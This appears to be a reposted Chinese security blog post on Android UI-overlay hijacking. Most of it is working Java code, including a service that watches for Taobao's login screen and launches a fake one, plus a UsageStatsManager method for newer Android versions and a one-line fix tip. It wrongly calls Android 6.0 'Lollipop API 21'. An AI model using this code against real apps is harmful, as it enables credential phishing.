Activity劫持的危害

界面劫持是指当客户端程序调用一个应用界面时，被恶意的第三方程序探知，如果该界面组件是恶意程序预设的攻击对象，恶意程序立即启动自己的仿冒界面并覆盖在客户端程序界面之上。此时用户可能在无察觉的情况下将自己的账号、密码信息输入到仿冒的信息输入界面中，恶意程序再把这些数据返回到服务器中，完成钓鱼攻击。

目前主要的界面劫持攻击通常发生在Android6.0以下的设备中。界面劫持风险将导致用户关键信息，例如账号、密码、银行卡等关键信息被窃取等风险。

Android 6.0 前怎么劫持

Android 6.0(Android 6.0 = Lollipop API level 21) 之前劫持的方法很简单。

ActivityManager activityManager = (ActivityManager) this.getSystemService(Context.ACTIVITY_SERVICE);ActivityManager.RunningTaskInfo info = manager.getRunningTasks(1).get(0);String shortClassName = info.topActivity.getShortClassName();    //类名String className = info.topActivity.getClassName();              //完整类名String packageName = info.topActivity.getPackageName();          //包名

一个完整的劫持案例

注册一个空白Activity，作为冒充的页面
AttackActivity

注册一个服务，循环监听顶层Activity包名

package com.example.Demo;import android.app.ActivityManager;import android.app.Service;import android.content.Context;import android.content.Intent;import android.os.IBinder;import android.support.annotation.Nullable;import android.util.Log;import android.os.Handler;/** * Created by Mysticbinary on 2019/3/25. */public class AttackService extends Service {    private Handler handler;    private int temp = 1;    @Nullable    @Override    public IBinder onBind(Intent intent) {        return null;    }    @Override    public int onStartCommand(Intent intent, int flags, int startId) {        Log.i("777777:", "后台启动...");        handler = new Handler();        new Thread(new Runnable() {            @Override            public void run() {                while (temp == 1) {                    try {                        Log.i("777777:", "handler run ing...");                        ActivityManager manager = (ActivityManager) getSystemService(Context.ACTIVITY_SERVICE);                        ActivityManager.RunningTaskInfo info = manager.getRunningTasks(1).get(0);                        //String shortClassName = info.topActivity.getShortClassName();    //类名                        String className = info.topActivity.getClassName();              //完整类名                        //String packageName = info.topActivity.getPackageName();          //包名                        //Log.i("777777 :", shortClassName);                        Log.i("777777 当前Top Activity :", className);                        //Log.i("777777 :", packageName);                        if(className.contains("com.taobao.controllers.activity.LoginActivity")){                            Log.i("777777 :", "开始跳转到假页面去！！！");                            Intent intent = new Intent(getBaseContext(), AttackActivity.class);                            intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);                            getApplication().startActivity(intent);                        }                        Thread.sleep(2000);                    } catch (InterruptedException e) {                        e.printStackTrace();                    }                }            }        }).start();        return super.onStartCommand(intent, flags, startId);    }    @Override    public void onDestroy() {        temp = 0;        super.onDestroy();        Log.i("777777 :", "后台结束！");    }}

Android 6.0 后怎么劫持

到了Android6.0版本之后，即Marshmallow（api level 23）时，大部分方法都失效了，如同getSystemService(Context.ACTIVITY_SERVICE)之类的方法除了能获取自己app中的信息外，还能获取启动器的信息，其它APP一律不显示。道理是很简单的，Marshmallow以权限严格著称，因此对于这种可能泄露其他应用信息的方法一概禁止了。

可以看出到了Android6.0后，即使有方法能获取到，也是非常麻烦的，需要用户手动授权的。

一个完整的劫持案例

1.修改AndroidManifest.xml，添加权限

2.检测并引导用户开启权限

从Marshmallow开始，用户可以一个一个的给app授权，意味着系统对权限的管理更加严格了。这里，我们的app必须让用户开启“Apps with usage access”权限。检测用户是否开启权限的代码;

//检测用户是否对本app开启了“Apps with usage access”权限private boolean hasPermission() {     AppOpsManager appOps = (AppOpsManager)                getSystemService(Context.APP_OPS_SERVICE);     int mode = 0;     if (Build.VERSION.SDK_INT > Build.VERSION_CODES.KITKAT) {         mode = appOps.checkOpNoThrow(AppOpsManager.OPSTR_GET_USAGE_STATS,                    android.os.Process.myUid(), getPackageName());    }         return mode == AppOpsManager.MODE_ALLOWED; }

引导用户开启权限的代码

private static final int MY_PERMISSIONS_REQUEST_PACKAGE_USAGE_STATS = 1101;@Overrideprotected void onActivityResult(int requestCode, int resultCode, Intent data) {      if (requestCode == MY_PERMISSIONS_REQUEST_PACKAGE_USAGE_STATS) {         if (!hasPermission()) {            //若用户未开启权限，则引导用户开启“Apps with usage access”权限            startActivityForResult(                  new Intent(Settings.ACTION_USAGE_ACCESS_SETTINGS),             MY_PERMISSIONS_REQUEST_PACKAGE_USAGE_STATS);            }        }    }

3.使用UsageStatsManager来获取当前运行的app

private void getTopApp(Context context) {     if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.LOLLIPOP) {            UsageStatsManager m = (UsageStatsManager) context.getSystemService(Context.USAGE_STATS_SERVICE);                if (m != null) {                    long now = System.currentTimeMillis();                    //获取60秒之内的应用数据                    List
    
      stats = m.queryUsageStats(UsageStatsManager.INTERVAL_BEST, now - 60 * 1000, now);                    Log.i(TAG, "Running app number in last 60 seconds : " + stats.size());                    String topActivity = "";                    //取得最近运行的一个app，即当前运行的app                    if ((stats != null) && (!stats.isEmpty())) {                        int j = 0;                        for (int i = 0; i < stats.size(); i++) {                            if (stats.get(i).getLastTimeUsed() > stats.get(j).getLastTimeUsed()) {                                j = i;                            }                        }                        topActivity = stats.get(j).getPackageName();                    }                    Log.i(TAG, "top running app is : "+topActivity);                }            }     }

获取的Log

04-24 13:28:06.041 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: top running app is : com.example.android.apis04-24 13:28:08.082 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: Running app number in last 60 seconds : 2404-24 13:28:08.082 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: top running app is : com.example.android.apis04-24 13:28:10.111 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: Running app number in last 60 seconds : 2404-24 13:28:10.111 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: top running app is : com.google.android.googlequicksearchbox04-24 13:28:12.117 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: Running app number in last 60 seconds : 2404-24 13:28:12.117 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: top running app is : com.google.android.googlequicksearchbox04-24 13:28:14.155 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: Running app number in last 60 seconds : 2404-24 13:28:14.155 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: top running app is : com.android.dialer04-24 13:28:16.190 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: Running app number in last 60 seconds : 2404-24 13:28:16.190 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: top running app is : com.android.dialer04-24 13:28:18.232 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: Running app number in last 60 seconds : 2404-24 13:28:18.232 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: top running app is : com.google.android.googlequicksearchbox04-24 13:28:20.279 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: Running app number in last 60 seconds : 2404-24 13:28:20.279 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: top running app is : com.android.messaging04-24 13:28:22.311 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: Running app number in last 60 seconds : 2404-24 13:28:22.311 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: top running app is : com.google.android.googlequicksearchbox

修复建议

页面切换到后台时，打个Toast提示一下。

例如大部分的银行类APP里面的任何界面切换到后台都会Toast提示：XXXX已切换至后台运行

转载于:https://www.cnblogs.com/mysticbinary/articles/10599248.html

你可能感兴趣的文章